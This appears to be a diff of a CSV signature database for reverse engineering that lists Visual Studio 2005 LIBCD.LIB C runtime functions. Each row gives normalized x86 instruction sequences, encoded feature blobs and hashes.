rsHA0JWcO2Q2bnIZROJyGUTichlE4KdmrsCBAyDRCAu3/KdmrsF6jgycBH6QXNRZyEySjmVwAAAAAlnPwX5yGUTgAAAAADtkNm5yGUTiU9qNBQgLt/5yGUTichlE4AR+kF16jgycAAAAAnIZROLUuiV41FnITNRZyEySjmVwAAAAA7HAQGhdxje1eo4Mn1Nnuy5Zz8F+bAlEAIEDINJyGUTichlE4Oo27l7UuiV41FnITtS6JXpyGUTichlE4mwJRAJyGUTgAAAAAnIZROLUuiV41FnITNRZyEySjmVwAAAAAnIZROJyGUTichlE4NRZyEySjmVwAAAAAnIZRODUWchOchlE4XqODJxdxje0AAAAAtS6JXpyGUTichlE4nIZROJyGUTichlE4nIZRONTZ7suchlE4,13b93e1e7b6fb0b45b62e84d9b9404661d8950f8,VS2005,LIBCD.LIB
+__cgets,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",Ac6Z6QIF58oAAAAAeypWdU+LzAoAAAAAAgXnyk+LzAoAAAAAlz11KmnNBgDPxuyvUjXo6p9jQcqdKY9QKw5X6JyGUTiu4nIonSmPUAIF58oAAAAAac0GAAIF58pSNejqnIZROHsqVnUUcroEBIMTg5c9dSpmeTE1yZQosSQDw50EgxODJAPDnZc9dSpmeTE1T4vMCgAAAAAAAAAAFHK6BHsqVnUBzpnpruJyKAIF58oAAAAAn2NBypyGUTgrDlfoZnkxNU+LzAoAAAAAz8bsrwIF58pSNejq,[],835feea713dd5496467197896a40f21de844a210,VS2005,LIBCD.LIB
+_ungetwc,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32",t5wE4+RSvJ+S9NEBUNgOkjs0JdQp2auwptRplcSg0gkAAAAAnIZROORSvJ+S9NEBXz8P5sSg0gkAAAAAkvTRAeRSvJ91gwavOzQl1JyGUTgp2auwKdmrsJSWRFydWiLm/qOPyMSg0gkAAAAAdYMGr5yGUTiNHjpB5FK8n5yGUTiNHjpB6t8LjCUsriLWeWuxjR46Qf/fd/gx6QSgnIZROCUsriLWeWux1nlrsV8/D+YAAAAAKdmrsOrfC4z+o4/IMekEoCnZq7CYUMXSlJZEXDs0JdS0cKtsOzQl1M2tnwMp2auw/993+MSg0gkAAAAAzax43zs0JdS0cKtsxKDSCQAAAAAAAAAAmFDF0v/fd/jEolOYKdmrsJuuKdeVFn78JSyuIl8/D+YAAAAAxKJTmDs0JdQp2auwlRZ+/MSg0gkAAAAAtHCrbDs0JdSm1GmVm64p182tnwMAAAAAxKJTmP/fd/gp2auwza2fA8Sg0gkAAAAAKdmrsMSiU5hQ2A6SnVoi5s2seN8AAAAA,[],1cda23352eb77b2d8be6759645dc04adaede612b,VS2005,LIBCD.LIB
+_system,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nNEG R32\nSBB R32,R32\nINC R32",JAPDnbD64W0kA8OddYMGr6QXY292o4Df5FK8n6QXY292o4DfkvTRAeRSvJ91gwav9CnuCEMFI4MAAAAAdqOA37D64W3f8aleQwUjg8Sg0gkAAAAAnIZROIxaEeT0Ke4I7jk0/aQXY2+chlE4lnPwX0MFI4MAAAAAxKDSCQAAAAAAAAAAoDc6ocSg0gkAAAAA3/GpXqA3OqEkA8OdJAPDnbD64W2gNzqhsPrhbZZz8F/0Ke4I9CnuCMuCy5UAAAAApBdjb+RSvJ+S9NEBy4LLlcSg0gkAAAAAjFoR5MuCy5UAAAAA,[],34bd4f9f57c9bed9ca4b1bf04c3645bb56fb8132,VS2005,LIBCD.LIB
+__mbsncpy,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",BJYM7X0JSDQAAAAANXKDC2nNBgB2ZN6YDTmJ130JSDQAAAAANRZyE2nNBgAAAAAAy/6SnTUWchNeo4MnXqODJ30JSDQAAAAAac0GAH0JSDTUwFx8fQlINEFF0BsNOYnXQUXQG0+LzAoAAAAAdmTemE+LzAoAAAAAT4vMCgAAAAAAAAAA1MBcfMv+kp19ZM9bfWTPW16jgycElgztXqODJzUWchMAAAAA,[],bdd4b8cd09f9be4f55660d14b51258517cd3906b,VS2005,LIBCD.LIB
+__DllMainCRTStartup@12,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32",nIZROCQDw52chlE4nIZROEFF0Burq7OBnIZROMjpj20kA8Odq6uzgZyGUTg6jbuXJAPDnZyGUThOWm5tTlpubZyGUTiOYHU5Oo27l0FF0BskA8OdnIZROEFF0BskA8OdnIZROJyGUTiOYHU5JAPDnUFF0BtkEvNxjmB1OZyGUTgAAAAAZBLzcUFF0BsAAAAAnIZROMjpj20NzMABQUXQG4D9In4AAAAADczAAYD9In4AAAAAgP0ifgAAAAAAAAAAyOmPbZyGUTichlE4lwFqP5yGUTgkA8OdnIZROJyGUTg2I2BQNiNgUJyGUTgAAAAAJAPDnZyGUThmeTE1ZnkxNYD9In4AAAAAnIZROKurs4GchlE4,[],6e0621a83b37038d2f54e259c4f7c801d0d8247c,VS2005,LIBCD.LIB
+__CRT_INIT@12,"CALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",hYPD3JyGUTjotJYiDczAAV5htw8AAAAACyuLmgAAAAAAAAAAZnkxNV5htw8AAAAA1U+TIQsri5oAAAAAZgZ7f+LczayN7/2oXmG3DwAAAAAAAAAA6LSWItVPkyFmeTE1zSHRPgsri5oAAAAAnIZROAsri5okA8OdpZxfggsri5oAAAAAJAPDnQ3MwAFmBnt/je/9qKWcX4LNIdE+4tzNrKWcX4LNIdE+,[],02389e39afec68a71d775dfde9b13d6c8def25b5,VS2005,LIBCD.LIB
+__fseeki64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32",Lw/AqJZz8F/0Ke4It5wE4+RSvJ+S9NEBQX9XsjHpBKATMfSvJ2tVgZZz8F/0Ke4InIZROORSvJ+S9NEBkvTRAeRSvJ91gwavcAHBCTHpBKATMfSvdYMGr5yGUThi2SnJ5FK8n5yGUThi2SnJ9CnuCEFF0BsAAAAAYtkpyR4YujmchlE4lnPwX0FF0BsAAAAAEzH0rydrVYEAAAAAxKDSCQAAAAAAAAAAnIZROFCpBaGchlE4QUXQG8Sg0gkAAAAAnIZROFCpBaGchlE4MekEoCdrVYEx6QSgnIZROFCpBaEeGLo5Hhi6OcSg0gkAAAAAMekEoCdrVYHke5wD5HucAydrVYEvD8CoUKkFoXABwQlBf1ey,[],21481a9eed9253693995be60155a1a88595b9989,VS2005,LIBCD.LIB
+_fwrite,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",uktfOukfRqAcZM0dvDjyKmnNBgAAAAAAz8bsr9Uc1LZtG5Lqac0GANUc1LZtG5LqZimUck+LzAoAAAAAbRuS6nblFGYp2auwHGTNHU+LzAoAAAAAduUUZpc0Qw7ke5wDp7EVk3+RhYu8OPIq5HucA5yGUTgvAnJCKdmrsHblFGbsdoa77HaGu4iuc69xWpQ6LwJyQpyGUTgNnGVGvDjyKhrvZQ4AAAAA6R9GoF6jgyd30TwpcVqUOlYFE9EAAAAAlKNS920bkupmeTE1iK5zrzUWchMAAAAADZxlRk+LzAoAAAAAGu9lDmnNBgAAAAAAVgUT0TUWchMAAAAAf5GFi2nNBgAAAAAANRZyE2nNBgAAAAAAd9E8KU+LzAoAAAAA1RzUtgAAAAAAAAAAnIZROF0WRVxN01UtT4vMCgAAAAAAAAAATdNVLbpLXzoAAAAAZnkxNU+LzAoAAAAAbRuS6s/G7K+8OPIqXRZFXOkfRqAcZM0dXqODJzUWchMAAAAAlzRDDqexFZNmKZRy,[],ba8747341fd1e94ec9abc1401b579421782b211f,VS2005,LIBCD.LIB
+_wcsftime,"PUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST",3rvB2EMY4MpmeTE1XqODJ7qnmyMAAAAAZnkxNU+LzAoAAAAAI19jRAAAAAAAAAAAT4vMCgAAAAAAAAAAogAEuLqnmyMjX2NEHURuxrqnmyOiAAS4QxjgylkPKwReo4MnuqebIwAAAAAAAAAAWQ8rBB1EbsZeo4MnXqODJ7qnmyMAAAAA,[],3c2a3d1ae5ab24e0f4ac29a63a49104c1961fb52,VS2005,LIBCD.LIB
+__wmkdir,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",nIZROCbu4WWZeO5vmXjub0+LzAoAAAAAT4vMCgAAAAAAAAAAbGYbnJyGUTgAAAAAJu7hZU+LzAoAAAAAlnPwX5yGUTgAAAAA6M8b6ZZz8F9sZhuc,[],b99b91d84a9b6452b9b29ce9c35315e329ff813f,VS2005,LIBCD.LIB
+__NLG_Return,PUSH R32\nCALL CONST\nPOP EBP\nPOP R32\nPOP R32\nLEAVE\nRETN CONST,KrNC3tHRKE0AAAAA0dEoTQAAAAAAAAAACPIyYtHRKE0qs0Le,[],77dc7c89d89a571caf53d759853efec66c9fb736,VS2005,LIBCD.LIB
+__CallSettingFrame@12,"MOV CONST,CONST\nPUSH R32\nCALL CONST\nPOP EBP\nPOP R32\nPOP R32\nLEAVE\nRETN CONST",4rM5XwAAAAAAAAAA0dEoTQAAAAAAAAAA2e8PcNHRKE3iszlf,[],4a4c86caaff9ce239e44f23d4e50b9394e6a1aba,VS2005,LIBCD.LIB
+__pipe,"CALL DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP CONST",yhvMUV6jgycAAAAA75WlS0+LzAoAAAAApywoPtsHce9mgpy7Ju7hZU+LzAoAAAAAl/ivtCQDw50AAAAAT4vMCgAAAAAAAAAAJCYl6K1aeUv0Ke4I9CnuCL7fFJYAAAAAXqODJyQDw50AAAAAlTwu+Cbu4WXvlaVLvt8UludTbXxYLwsjrVp5S+dTbXxYLwsjzpndf1TyUUWnLCg+WC8LI0+LzAoAAAAAZoKcu9sHce9U8lFF2wdx74g1+hzKG8xR51NtfJU8LviPVtdyiDX6HF6jgycAAAAAJAPDnSbu4WXvlaVLj1bXcpf4r7TOmd1/VPJRRYg1+hzKG8xR,[],8e991fc04bbe80cc82d78736c44cf78d7e6b7423,VS2005,LIBCD.LIB
+__rtindfnpop,"FSTP ST\nFLD TBYTE PTR DS:[0]\nCMP BYTE PTR SS:[EBP+CONST],0\nJCC CONST",ncd8h/jrCHaz9wnBs/cJwfjrCHYAAAAA+OsIdgAAAAAAAAAA,[],6ff12c0129b9fab075339cb65b39d35ce01fb9b3,VS2005,LIBCD.LIB
+__trandisp1,"MOV R16,CONST\nMOV WORD PTR SS:[EBP+CONST],R16\nFLDCW WORD PTR SS:[EBP+CONST]\nMOV R32,0\nFXAM\nMOV DWORD PTR SS:[EBP+CONST],R32\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]",h/BMLgAAAAAAAAAAowqrM4fwTC4AAAAApGZUJAAAAAAAAAAAJw91EqRmVCSjCqsz,[],5f8c640b35a13a02c84177763f233645faf96817,VS2005,LIBCD.LIB
+__rtindfpop,"FSTP ST\nFSTP ST\nFLD TBYTE PTR DS:[0]\nCMP BYTE PTR SS:[EBP+CONST],0\nJCC CONST",Tc6dp/jrCHaz9wnB+OsIdgAAAAAAAAAAs/cJwfjrCHYAAAAA,[],dabda556ed6a8ba3b8c77d8119e45de054b59a91,VS2005,LIBCD.LIB
+__rtzeropop,FSTP ST\nFSTP ST\nFLDZ\nRETN,XXYzDAAAAAAAAAAA,[],9d260061978fcf60c5bc0fa5f6a2633e13cbc3a6,VS2005,LIBCD.LIB
+__rttosnpopde,"MOV BYTE PTR SS:[EBP+CONST],CONST\nOR R8,R8\nRETN",r5LkeAAAAAAAAAAA,[],9952aee67aefd316e7bf8866ac76e04306da0f1e,VS2005,LIBCD.LIB
+__rtonepop,FSTP ST\nFSTP ST\nFLD1\nRETN,XXYzDAAAAAAAAAAA,[],d4bf35a9d95f0870a8dfc495c0f4f53dec16424f,VS2005,LIBCD.LIB
+__rtnospopde,INT3\nINT3\nINT3\nCALL CONST\nJMP SHORT CONST,N9QtU9JfQDIAAAAA0l9AMtJfQDIAAAAA,[],34daf69af536436575aae6ddf41edb10f5fcd13d,VS2005,LIBCD.LIB
+__rttospop,FSTP ST\nRETN,l6nKSu53GNMAAAAA7ncY0wAAAAAAAAAA,[],f57e5e79508c9935dc1f3ca970746b4a22bd3956,VS2005,LIBCD.LIB
+__rttosnpop,RETN,AaF1swAAAAAAAAAA,[],8bf7b464aaa2c2b536aa1d76a1297c19155f5603,VS2005,LIBCD.LIB
+__tosnan1,"FSTP TBYTE PTR SS:[EBP+CONST]\nFLD TBYTE PTR SS:[EBP+CONST]\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",fLAGUQAAAAAAAAAASJv5BAAAAAAAAAAA/tzXO0ib+QR8sAZR,[],52081b043556d03c756cac133b1ba92523a81edf,VS2005,LIBCD.LIB
+__rtnospop,FSTP ST\nRETN,7ncY0wAAAAAAAAAA,[],59760fe85545571e02f1c89c05c3693bed7d9f6b,VS2005,LIBCD.LIB
+__trandisp2,"MOV R16,CONST\nMOV WORD PTR SS:[EBP+CONST],R16\nFLDCW WORD PTR SS:[EBP+CONST]\nMOV R32,0\nFXAM\nMOV DWORD PTR SS:[EBP+CONST],R32\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]",k61uAgAAAAAAAAAAowqrM5OtbgIAAAAAgAWK+QAAAAAAAAAAJw91EoAFivmjCqsz,[],0853baab82320ab49db8a6553fef8b77b97560bc,VS2005,LIBCD.LIB
+__nosnan2,"FXCH ST(1)\nFSTP TBYTE PTR SS:[EBP+CONST]\nFLD TBYTE PTR SS:[EBP+CONST]\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",s/cJwe53GNMAAAAA7ncY0wAAAAAAAAAAI+8kvbP3CcEjsvDFI7Lwxe53GNMAAAAA,[],72a89e436659b03a0d0da8e6271739ab51bea85b,VS2005,LIBCD.LIB
+__rtchsifneg,"OR R8,R8\nJCC CONST",AaF1swAAAAAAAAAA2M0EpgGhdbOXqcpKl6nKSgGhdbMAAAAA,[],a9ac73328e1d4d6d5bb5059cdcc95da37514407b,VS2005,LIBCD.LIB
+__rttospopde,CALL CONST\nFXCH ST(1),7ncY0wAAAAAAAAAAFFpvVe53GNMAAAAA,[],b434352a9e71ad6dbc9f7ca0b026e319a3425c00,VS2005,LIBCD.LIB
+__nan2,"FXCH ST(1)\nFSTP TBYTE PTR SS:[EBP+CONST]\nFLD TBYTE PTR SS:[EBP+CONST]\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",I+8kvbP3CcEjsvDF7ncY0wAAAAAAAAAAs/cJwe53GNMAAAAAI7Lwxe53GNMAAAAA/tzXO7P3CcEj7yS9,[],e8a4770d9723db57939a6c1c177fc22373a679a5,VS2005,LIBCD.LIB
+__rtonenpop,FSTP ST\nFLD1\nRETN,sPZ2lgAAAAAAAAAA,[],8cf49096853de49371538144368d01e3c67e0b63,VS2005,LIBCD.LIB
+__rtzeronpop,FSTP ST\nFLDZ\nRETN,sPZ2lgAAAAAAAAAA,[],b7795232b85d8c5693bdffbba2b10dca238d91f8,VS2005,LIBCD.LIB
+__tosnan2,"FSTP TBYTE PTR SS:[EBP+CONST]\nFLD TBYTE PTR SS:[EBP+CONST]\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",7ncY0wAAAAAAAAAAs/cJwe53GNMAAAAA/tzXO7P3CcEjsvDFI7Lwxe53GNMAAAAA,[],79d06168c04dd12046ac4717ea0e0cf18cee76b7,VS2005,LIBCD.LIB
+_srand,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nPOP EBP\nRETN",0SFUiAAAAAAAAAAA,[],61c267acf3330dd3e20bbeb3994b4b6917a16944,VS2005,LIBCD.LIB
+_rand,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nIMUL R32,R32,CONST\nADD R32,CONST\nMOV DWORD PTR DS:[0],R32\nMOV R32,DWORD PTR DS:[0]\nSAR R32,CONST",+oy8GgAAAAAAAAAA,[],5a5de245895011fbdb37a7b3d315bc7ccff49b57,VS2005,LIBCD.LIB
+_getc,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",NV3SuwAAAAAAAAAA,nIZROORSvJ+S9NEBl+CQsZk9lOYAAAAAdYMGr5yGUTintFwk5FK8n5yGUTintFwkkvTRAeRSvJ91gwavp7RcJJfgkLE3oTO2N6Eztpk9lOYAAAAAmT2U5gAAAAAAAAAAt5wE4+RSvJ+S9NEB,a1cd9a193cdca3f0d3bd9876c6debf52e442d563,VS2005,LIBCD.LIB
+_fgetc,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",nIZROORSvJ+S9NEBl+CQsZk9lOYAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTintFwkkvTRAeRSvJ87j6vlp7RcJJfgkLE3oTO2mT2U5gAAAAAAAAAAma5ZK5yGUTgAAAAAN6Eztpk9lOYAAAAA,[],0b65e0adfa1e2910f5bfa21e637c0506d89b1891,VS2005,LIBCD.LIB
+___crtGetStringTypeW,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",0UiUpeRDOb6chlE423BuG0KOTYkNzMABnIZRODeRrHwU6wZLFOsGS5re869meTE1DczAATEuOrEAAAAAQo5NiTEuOrEAAAAAnIZROJyGUThmeTE1nIZROD73NQ1meTE1N5GsfJre869meTE1ZnkxNTEuOrEAAAAAZnkxNTEuOrEAAAAAGaZm/yQDw50AAAAAnIZRODgdV/wsbH9tPvc1DbaA3uVmeTE1LGx/bQ3MwAHbcG4b4Z7KcmZ5MTUZpmb/5EM5vgAAAAAAAAAAOB1X/A3MwAHbcG4bZnkxNTEuOrEAAAAAMS46sQAAAAAAAAAAGaZm/yQDw50AAAAAmt7zr5yGUTgAAAAAS4HbzOGeynIZpmb/ZnkxNTEuOrEAAAAAZnkxNTEuOrEAAAAAtoDe5ZyGUTgAAAAAJAPDndFIlKVVrii4LaOCjSQDw51LgdvMVa4ouDEuOrEAAAAA,[],d8cf7adb952c051a1e4783a1aea1be8b32f5977a,VS2005,LIBCD.LIB
+_div,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ\nIDIV DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",8QXFM0gkIoYAAAAAoS4wyUgkIoachlE4SCQihgAAAAAAAAAAnIZROEgkIobxBcUz,[],2d41a5ea1b599e96f58bebc7bc718882e9c3cf4e,VS2005,LIBCD.LIB
+_vfwprintf,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",kvTRAeRSvJ87j6vl/qje9gAAAAAAAAAAma5ZK5yGUTgAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4kvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTj+qN72,[],e838d2d2f8d0003b457beaab5ca7d0bd7dc81325,VS2005,LIBCD.LIB
+_fwscanf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROORSvJ+S9NEBdYMGr5yGUTichlE45FK8n5yGUTichlE4kvTRAeRSvJ91gwavnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTgcY9GLkvTRAeRSvJ87j6vlmY/2juRSvJ+S9NEBHGPRiwAAAAAAAAAA,[],78da28a30e670df09f72363be74b8ef1d2078fec,VS2005,LIBCD.LIB
+__mbsnccnt,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",fQlINNUc1Lbh2QV5ojkvFX0JSDQAAAAAsUYUnV6jgydeo4Mn3zcCStUc1Lbh2QV54dkFedUc1LZ33LbYfQlINF6jgyexRhSdXqODJ9Uc1LYAAAAAXqODJ983AkoAAAAA1RzUtgAAAAAAAAAAd9y22F6jgyd9CUg0,[],6673213b64a55412e51d3f788e9ba614ea27aed8,VS2005,LIBCD.LIB
+_wctomb,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",QbrgcFyI5OB1rUsNVaatKCQDw51meTE1nIZROEFF0Bt1rUsNda1LDU+LzAoAAAAAmvSBGnWtSw2chlE4da1LDU+LzAoAAAAAZnkxNU+LzAoAAAAAJAPDnZr0gRpBuuBwXIjk4E+LzAoAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAA,[],1f0f9aef3bb7651e9835d8476df7c025824eb2f0,VS2005,LIBCD.LIB
+__chmod,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",R4CkOU+LzAoAAAAAcnVwhFJnfwZHgKQ5FLX/TCbu4WVHgKQ5wQcNTybu4WVHgKQ5Umd/BsEHDU/IUl/XJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAR4CkOU+LzAoAAAAAyFJf1xS1/0wAAAAA,[],076c78da97200ee5a95dd8e7521caeea7a1c36ec,VS2005,LIBCD.LIB
+__mbsrev,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP CONST",g65DXkFF0BuGqVbQ4dkFeV6jgyeXhqcLUMBSf16jgyfh2QV5lZe2SE+LzAoAAAAAhqlW0IOuQ14AAAAAXqHtpeHZBXmVl7ZIl4anC16jgycAAAAA4dkFeT7KhtlQwFJ/XqODJz7KhtkAAAAAXqODJ+HZBXkAAAAAQUXQG0+LzAoAAAAAPsqG2YOuQ14AAAAAT4vMCgAAAAAAAAAA,[],23da7e2d2fa00396a333fc20acf4caffce16bebd,VS2005,LIBCD.LIB
+??_L@YGXPAXIHP6EX0@Z1@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",CZfunPShJ3lMbBD69KEneb8PYsgAAAAAK6ElgoOuQ14AAAAAg65DXvShJ3lMbBD6TGwQ+gmX7pwAAAAAvw9iyAAAAAAAAAAA,[],4114f00f02389cc7f015ce8b75b5bfd8d4ad30cf,VS2005,LIBCD.LIB
+___crtwsetenv,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",UC7ZLibu4WVypuLgXqODJ2nNBgAAAAAAGKsipSjZPZ8AAAAAnIZROGZ5MTWchlE4JAPDnTk2YRy5yE5g0UiUpTk2YRychlE4L6JF1QAAAAAAAAAAnIZROEhSQEyt/Rq5uchOYD1SIA+vJ1dcrf0auUhSQEwAAAAAlRr8Z16jgydEiWK9JAPDnZyGUThSaOpbSFJATP5UgrWvJ1dcPsqG2SjZPZ8AAAAAp/+HGK8nV1wlFsgrKNk9n5Ua/GcQVj8BJu7hZS+iRdUAAAAArydXXC+iRdUAAAAAJRbIK68nV1yDrkNe1+NYFTk2YRychlE4EFY/AT7KhtkAAAAAcqbi4Cbu4WUAAAAArydXXC+iRdUAAAAANRZyEzk2YRwAAAAAnIZROCQDw51meTE1PVIgDzk2YRwAAAAAZnkxNS+iRdUAAAAAg65DXn3nJ/qvJ1dcrydXXC+iRdUAAAAAJAPDnSQDw525yE5gOTZhHJyGUTh25RRmrydXXC+iRdUAAAAA/lSCtWnNBgAAAAAAUmjqWzUWchOvJ1dcuchOYGWCGw2vJ1dcfecn+tFIlKXX41gVRIlivV6jgycAAAAAZnkxNS+iRdUAAAAAduUUZpyGUTichlE4rydXXC+iRdUAAAAAnIZROJyGUTgkA8OdXqODJ16jgycAAAAA26QWQl6jgycAAAAAac0GACbu4WVQLtkuZYIbDTk2YRy5yE5gnIZRONukFkIYqyKl,[],55038b70c0bdec64a2c6f6c94fae22aa7d34431b,VS2005,LIBCD.LIB
+_longjmp,"LEA R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST\nOR R32,R32\nJCC CONST",uqBeBLu2XCwFKPtFjJdPeosVZXS06ChhixVldOmQYbwAAAAAtOgoYYsVZXQuVbn+6ZBhvAAAAAAAAAAABSj7Rbu2XCwAAAAALlW5/umQYbxNdd6iu7ZcLOmQYbyMl096TXXeoumQYbwAAAAA,[],e4d4062f4258f6949235d74c66eb0147b5e9451e,VS2005,LIBCD.LIB
+__freebuf,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",qpPdsgAAAAAAAAAAhxxsSgAAAAAAAAAAbRuS6qqT3bIx6QSgMekEoKqT3bKHHGxKs1oPwORSvJ+S9NEBnIZROORSvJ+S9NEBdYMGr5yGUThtG5Lq5FK8n5yGUThtG5LqkvTRAeRSvJ91gwav,[],ad6db83513d0b3426d30d966ccadce6a727037a9,VS2005,LIBCD.LIB
+_vfprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",t5wE4+RSvJ+S9NEBnIZROORSvJ+S9NEBdYMGr5yGUTichlE45FK8n5yGUTichlE4kvTRAeRSvJ91gwavnIZROORSvJ+S9NEBdYMGr5yGUTj+qN725FK8n5yGUTj+qN72kvTRAeRSvJ91gwav/qje9gAAAAAAAAAA,[],7cfaa18b46e0d0071b1564f00cb30e67d541c619,VS2005,LIBCD.LIB
+_abort,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST",f2+mnAAAAAAAAAAA,28KjsSUCAlpo1qJRm46yj8Sg0gkAAAAA1NnuyxZ7h1DjMNBoJuQBqiQDw51ZcDi/JAPDnZuOso8kA8Od0d+5AJq3Mc/bwqOxFnuHUMSg0gmLDRRMxKDSCQAAAAAAAAAAaNaiUcSg0gkAAAAAJQICWsSg0gkAAAAAJAPDnX5GQ3QkA8OdnIZROBZ7h1DjMNBo4zDQaF6jgydeo4Mn3EdD7pyGUTgAAAAAmrcxzyUCAlpo1qJRXqODJxZ7h1AAAAAAXqODJ9TZ7ssAAAAAWXA4v5uOso8kA8OdJAPDnX5GQ3SbjrKPfkZDdMSg0gnR37kAiw0UTCQDw50m5AGq,e504084e6644aa939bd0fe664e4df73c488ddc0c,VS2005,LIBCD.LIB
